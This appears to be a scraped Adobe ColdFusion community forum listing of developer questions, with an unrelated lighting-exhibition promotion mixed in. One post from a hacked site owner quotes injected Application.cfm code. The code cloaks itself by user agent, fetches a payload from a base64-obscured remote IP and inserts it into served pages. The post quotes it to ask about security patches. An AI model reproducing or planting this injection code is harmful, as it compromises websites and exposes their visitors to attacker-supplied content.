The official community for ColdFusion.
Recently active
We have CF7 and CF8 servers that connects to an Oracle 11g database. We would like to set up an encrypted connection between the servers. Where do we enter the parameters to tell CF7 and CF8 to use an encrypted connection using the Oracle JDBC database driver?Mark R.
how can you see the answer after you answer it the question.
I've inherited a CF app and surprisingly I've never encountered calling a function or stored prodcedure like this before. I'm having trouble locating the datasource, I'm guessing it may be an Access db? <cfquery datasource="mydsn" name="myvariable"> {call displayLocation()} </cfquery>
I have an instructors schedule that shows each time a course is taught for example:Course Credits DayAAA123 3 Mon. Wed.The Credit only shows the first time (Print When Condition: calc.counter IS 1). I need to total the credits for each course when I use the Sum(credits) function it totals for each line (the above ezample would show a total of 6), I only want to sum if calc.counter EQ 1
This question was posted in response to the following article: http://help.adobe.com/en_US/ColdFusion/9.0/CFMLRef/WSc3ff6d0ea77859461172e0811cbec1a60c-7ffc.html
Is there any way to easily verify that .NET services are configured and working in ColdFusion 10? The settings are not exposed in the "Settings Summary" page and there's no test default "hello world" script. There is documentation on "installation", but no instructions on verifying that it's installed correctly:http://help.adobe.com/en_US/ColdFusion/10.0/Installing/WSc3ff6d0ea77859461172e0811cdec18969-7ff1.htmlI'm trying to integrate SautinSoft's HtmlToRDF .NET component (with sample code that was provided by other CF developers): <cfobject type=".NET" action="Create" class="SautinSoft.HtmlToRtf" name="ConvHTMLObj" assembly="c:\sautinsoft\SautinSoft.HtmlToRtf.dll">and I keep getting the following error: Class SautinSoft.HtmlToRtf not found in the specified assembly list. The assembly that contains the class must be provided to the assembly attribute.I've used .NET with past versions of ColdFusion,
China International Street Lighting Exhibition 2014 (ILE 2014)Date: March 1st -3rd, 2014 Venue: China Import & Export Fair Pazhou Complex ILE 2014 is expected to occupy 20000 sq.m with 700 booths and all the organizing committee of ILE 2014 has been doing our best to make it a more wonderful and fruitful event.ILE 2013 was wrapped up successfully and fruitfully in May last year. Some leaders of China municipal engineering association, China professional committee of the municipal city road lighting and some international guests were present in the opening ceremony. ILE 2013 attracted hundreds of famous enterprises to be exhibitors including Hongbao, Guangyu, OML Technology, TCS Tech, Yifeng, Shixin, Konka, Guangyu, SWR, etc. Besides, numbers of foreign brand exhibitors displayed their latest products like Proview Technology, Leadray and American code lighting so forth.With 10% annual market penetration growth
I have this XML data, and I know there is a node called <group> that has an attribute of tplID with a value of 'alpha'. There ARE other <group> nodes at the same (and different) hierarchy level, but they should at least have a different value in their 'tplID' attribute.Thing is, how would I go about, say, removing every child node from the XML document for the node that is specifically : <group tplID="alpha"> ?I can target him with XPath like <cfset test = xmlSearch( xmlDocObject, '/template//group[@tplID="alpha"]' ) />But this just returns me an array containing the XML that matches that. Any ideas?
We use Exchange here at work. and apparently Voltage as our secure email solution. The way I understand it, any email tagged as Confidential is automatically run through Voltage and thus secured. My question is, when using CFMAIL, is there a way to indicate a message is Confidential? Using CF8 BTW...
Installed CF10 64 bit on Windows 2008 R2 64bit and I was able to run the admin without issues.This morning I am unable to access it.... and nothing was changed over the weekend.Module IIS Web Core Notification Unknown Handler cfmHandler Error Code 0x80070005 Requested URL http://127.0.0.1:80/CFIDE/administrator/index.cfm Physical Path C:\ColdFusion10\cfusion\wwwroot\CFIDE\administrator\index.cfm Logon Method Not yet determined Logon User Not yet determined I ran WEB server configuration tool using the correct IIS site.Any ideas?
Recently upgraded from CF8 32bit and was using CFX_print to send ZPL code directly to a printer. Unfortunately 32bit DLLs do not load in 64-bit machines....Does anyone know or have an alternative to CFX_print that would run in 64 bits?
Currently i am reading data which is stored in .file in the format (abc|def|ghi|jkl|....|)using array and display the required data from the array as report data.Data is being appended to the .file every 20-39 mins. so the size of the .file is increasing which in turn makes the report to load slowly as it has to read the entire .file data everytime .Now i need an approach to store the data from .file into oracle database so that i can display the data from database inorder to lessen the time to load the data.any suggesstions pls ?
Yesterday some of our hosted sites were hacked using code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.Here's the hack:Application.cfm<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver"> <cfset mmy = cfhttp.FileContent><cfoutput>#mmy#</cfoutput></cfsavecontent> <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#"> <cfset cfs = cfhttp.FileContent><cfif (FindNoCase("</div>",paga) GT 0)><cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")><cfelseif (FindNoCase("</table>",paga) GT 0)><c
Why does this not return the variable form.item_cost to equal:199.99?<CFSET string1 = "Here we have $199.99 is the price"><CFSET form.item_cost = "#reMatchNoCase("^\d{0,4}(\.\d{1,2})?$",string1)#">I only want to match the first price it sees in the string and return that value as a numeric decimal.
I am trying to test the cfwebockets but i keep getting this error when i go to the webpage where i have the sample code. i have downloaded sample code from the adobe developers and it still gives me this error.I am using cF10 standard with websockets enabled on a win 2008 server 64bit. I am not getting any reaction from websockets as well. It won't subscribe or open connection. Any help?Here is the code i am using:<script> //messagehandler recieves all the messages from websocket function mycbHandler( messageobj) { var message = ColdFusion.JSON.encode(messageobj); var txt=document.getElementById("myDiv"); txt.innerHTML +=message +"<br>";
I have two URL's that I have changed in my code. Both are href tags in cfm pages. My problem is that when I view the page in a browser they are pointing to the wrong locations. Both URL's are external to my servers and require authintacaton. They temporarly redirect you to another page to login and then back to the requested page.Both URLs will work properly in a basic HTML page.Is there anywhere that CF will store old URLs?
Hi,i want to find the if the record from the list is matched with the record from the query but my code is not working. Can you please help? <cfset variables.subListItems = valuelist(variables.FindNocost.cost ,',') /> <cfset variables.FindSubNoCost = report_Nocost.getSubNoCost() /> <cfloop query="variables.FindSubNoCost"> #listFindNoCase(variables.subListItems ,item, ",")# </cfloop>Thanks
<cfselect name="MyList" id="MyList"> <cfoutput query="MySP"> <option value="#MySP.MyID#" <cfif (isDefined("form.MyID") AND form.MyID EQ MySP.MyID)>selected="selected"</cfif>>#MySP.MyCODE#</option> </cfoutput> </cfselect>I have above code and a cfseelct on the form.I use cfoutpit query to fill the option list.I would like to know does cfselect or standard slelect can fill option data using jQuery Ajax?Your help and information s great appreciated,Regards,Iccsi,
I have 5 select on the form and each one uses different data source from the query like following.I want to every one data limite by previous dropdown just like department, manager, supervisoe, leader and employees.If user select the first one department 1 then all the rest dropdown only shows department one managers, supervisors, leaders and employees.If user select one supervisors than only employee in hos or her group available for the users.I need pass client, previous value to the server and send back to client the rest of dropdown box.Any better way to handle this issue?Your help and information is great appreciated,Regards,Iccsi, <select name="MyList1" id="MyList1"> <cfoutput query="Myquery1"> <option value="#MyQuery1.MyID#">#MyQuery1.Mycode#</option> </cfoutput> </select><select name="MyList2" id="MyList2"> <cfoutput query="Myquery2"> <option value="#MyQuery2.MyID#">#MyQu
<cfselect> <option value="volvo">Volvo</option> <option value="saab">Saab</option> <option value="mercedes">Mercedes</option> <option value="audi">Audi</option></cfselect>I have above code on the form whihc has a cfselect on the form.I would like to let user add a new car if it does not exist in the list like 'BMW', 'Toyota'.The list does not let me enter new list does not exist.I would like to know are there any property to configure let user to enter a new list which does not exist.Your help and informaiton is great appreciated,Regards,Iccsi,
Dear Adobe Team,We are using adobe Photoshop CS5 in our HP Workstation machine, but since we changed our OS in windows 7 we are facing stroke problems.Like whenever we draw a straight stroke than it does not go straight it becomes curve type. Please find the below attached image of stroke.We are using cintiq Pen display & HP z420 workstation. So requesting you to kindly provide the solution ASAP
Howdy,Is there any place I can still purchase Coldfusion 9 standard still? I want to put together another server and I don't want to go through the entire code space and make changes again to go to coldfusion 10 right now, when i am currently running 9 and I just need to balance out the traffic peaks.Thanks.
I have a SELECT dropdown on the form and would like to have a function while user type then the dropdown will get the most close record for user to select.I tried to look on the internet, but no luck, It seems that CFSelect does not have this option.Any information is great appreciated,Regards,Iccsi,
After applying security patch APSB11-14 on 8.01 we are now seeing this error on every page that makes use of cfwindow. This is what the log file says: CFContainerID: Invalid input. Please conform to regex ^[\p{Alnum}_\-\.:]+$ with a maximum length of 100UPDATE: We found that the container name can't have a space. That stopped the error.This is what is in our cfwindow tag:<cfwindow center="true" closable="true" draggable="true" height="300" initShow="true" modal="false" name="Unavailable item" resizable="false" title="This item is no longer available" width="500"> text </cfwindow>
Hi,Quick question, are there any known issues with CF10 (update 11) and scheduled tasks? Today we had a dozen scheduled tasks, which run late in the night at completely different times, all run at once at 9am. The logs show CFSCHEDULE called the tasks from 127.0.0.1.Has anyone experienced something like that and is there any explanation?Thanks,Mark
Remix with Firefly Community Gallery
Thousands of free creations to fall in love with and remix in Firefly.
Already have an account? Login
No account yet? Create an account
Enter your E-mail address. We'll send you an e-mail with instructions to reset your password.